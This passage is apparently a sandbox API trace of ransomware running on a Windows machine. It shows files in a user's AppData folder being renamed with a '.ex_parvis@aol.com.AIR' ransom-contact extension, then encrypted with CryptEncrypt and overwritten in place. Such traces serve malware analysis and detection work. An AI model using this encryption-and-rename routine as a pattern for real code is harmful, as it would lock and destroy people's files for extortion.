"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f d3msfk65o.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f d3mSfK65o.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f d3msfk65o.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.193] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\f d3mSfK65o.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f d3msfk65o.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.193] GetProcessHeap () returned 0x2e0000 [0167.193] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0167.193] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=98229) returned 1 [0167.193] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x17fb5 [0167.193] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.193] GetProcessHeap () returned 0x2e0000 [0167.194] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.194] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.194] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.195] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.195] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.195] ReadFile (in: hFile=0x52c, lpBuffer=0x30f0048, nNumberOfBytesToRead=0x17fb5, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesRead=0x2acf9c8*=0x17fb5, lpOverlapped=0x0) returned 1 [0167.199] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-98229, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.199] WriteFile (in: hFile=0x52c, lpBuffer=0x3108008*, nNumberOfBytesToWrite=0x17fb5, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3108008*, lpNumberOfBytesWritten=0x2acf9c8*=0x17fb5, lpOverlapped=0x0) returned 1 [0167.199] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.199] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.199] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BI_bC_g09qzN.png", dwFileAttributes=0x80) returned 1 [0167.200] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BI_bC_g09qzN.png") returned 63 [0167.200] GetProcessHeap () returned 0x2e0000 [0167.200] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3ac428 [0167.200] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BI_bC_g09qzN.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BI_bC_g09qzN.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BI_bC_g09qzN.png" [0167.200] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BI_bC_g09qzN.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BI_bC_g09qzN.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BI_bC_g09qzN.png.12781717671972518758.ex_parvis@aol.com.AIR" [0167.200] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BI_bC_g09qzN.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bi_bc_g09qzn.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BI_bC_g09qzN.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bi_bc_g09qzn.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.203] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BI_bC_g09qzN.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bi_bc_g09qzn.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.203] GetProcessHeap () returned 0x2e0000 [0167.203] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0167.203] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=41623) returned 1 [0167.203] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xa297 [0167.203] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.203] GetProcessHeap () returned 0x2e0000 [0167.203] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.203] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.203] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.204] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.204] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.205] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xa297, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xa297, lpOverlapped=0x0) returned 1 [0167.205] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-41623, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.205] WriteFile (in: hFile=0x52c, lpBuffer=0x3bc6b0*, nNumberOfBytesToWrite=0xa297, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3bc6b0*, lpNumberOfBytesWritten=0x2acf9c8*=0xa297, lpOverlapped=0x0) returned 1 [0167.207] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.207] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.207] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ay5q59XtNkS6OizBaq.mp3", dwFileAttributes=0x80) returned 1 [0167.208] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ay5q59XtNkS6OizBaq.mp3") returned 69 [0167.208] GetProcessHeap () returned 0x2e0000 [0167.208] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf0) returned 0x336dd8 [0167.208] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ay5q59XtNkS6OizBaq.mp3" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ay5q59XtNkS6OizBaq.mp3") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ay5q59XtNkS6OizBaq.mp3" [0167.208] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ay5q59XtNkS6OizBaq.mp3", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ay5q59XtNkS6OizBaq.mp3.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ay5q59XtNkS6OizBaq.mp3.12781717671972518758.ex_parvis@aol.com.AIR" [0167.208] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ay5q59XtNkS6OizBaq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ay5q59xtnks6oizbaq.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ay5q59XtNkS6OizBaq.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ay5q59xtnks6oizbaq.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.212] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ay5q59XtNkS6OizBaq.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ay5q59xtnks6oizbaq.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.212] GetProcessHeap () returned 0x2e0000 [0167.212] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.212] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=45843) returned 1 [0167.212] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xb313 [0167.212] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.212] GetProcessHeap () returned 0x2e0000 [0167.212] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.212] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.212] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.213] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.213] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.213] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xb313, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xb313, lpOverlapped=0x0) returned 1 [0167.214] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-45843, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.214] WriteFile (in: hFile=0x52c, lpBuffer=0x3bd730*, nNumberOfBytesToWrite=0xb313, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3bd730*, lpNumberOfBytesWritten=0x2acf9c8*=0xb313, lpOverlapped=0x0) returned 1 [0167.215] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.215] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.215] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akCjbYb5j3OR.avi", dwFileAttributes=0x80) returned 1 [0167.215] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akCjbYb5j3OR.avi") returned 63 [0167.215] GetProcessHeap () returned 0x2e0000 [0167.215] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3ac428 [0167.215] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akCjbYb5j3OR.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akCjbYb5j3OR.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akCjbYb5j3OR.avi" [0167.215] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akCjbYb5j3OR.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akCjbYb5j3OR.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akCjbYb5j3OR.avi.12781717671972518758.ex_parvis@aol.com.AIR" [0167.216] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akCjbYb5j3OR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\akcjbyb5j3or.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akCjbYb5j3OR.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\akcjbyb5j3or.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.218] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akCjbYb5j3OR.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\akcjbyb5j3or.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.218] GetProcessHeap () returned 0x2e0000 [0167.218] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0167.218] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=60748) returned 1 [0167.218] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xed4c [0167.218] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.218] GetProcessHeap () returned 0x2e0000 [0167.218] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.218] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.218] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.219] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.219] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.220] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xed4c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xed4c, lpOverlapped=0x0) returned 1 [0167.221] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-60748, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.221] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0xed4c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xed4c, lpOverlapped=0x0) returned 1 [0167.222] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.222] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.222] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2uiM.m4a", dwFileAttributes=0x80) returned 1 [0167.222] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2uiM.m4a") returned 55 [0167.222] GetProcessHeap () returned 0x2e0000 [0167.222] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x336dd8 [0167.223] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2uiM.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2uiM.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2uiM.m4a" [0167.223] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2uiM.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2uiM.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2uiM.m4a.12781717671972518758.ex_parvis@aol.com.AIR" [0167.223] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2uiM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\2uim.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2uiM.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\2uim.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.226] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\2uiM.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\2uim.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0167.226] GetProcessHeap () returned 0x2e0000 [0167.226] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.226] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=89250) returned 1 [0167.226] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x15ca2 [0167.226] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.226] GetProcessHeap () returned 0x2e0000 [0167.226] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.226] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.226] WriteFile (in: hFile=0x52c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.227] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.227] WriteFile (in: hFile=0x52c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.228] ReadFile (in: hFile=0x52c, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x15ca2, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x15ca2, lpOverlapped=0x0) returned 1 [0167.229] SetFilePointer (in: hFile=0x52c, lDistanceToMove=-89250, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.229] WriteFile (in: hFile=0x52c, lpBuffer=0x30f0048*, nNumberOfBytesToWrite=0x15ca2, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x15ca2, lpOverlapped=0x0) returned 1 [0167.229] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.229] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.229] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Nrj.m4a", dwFileAttributes=0x80) returned 1 [0167.230] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Nrj.m4a") returned 55 [0167.230] GetProcessHeap () returned 0x2e0000 [0167.230] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x336dd8 [0167.230] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Nrj.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Nrj.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Nrj.m4a" [0167.230] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Nrj.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Nrj.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Nrj.m4a.12781717671972518758.ex_parvis@aol.com.AIR" [0167.230] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Nrj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1nrj.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1Nrj.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1nrj.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.233] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS 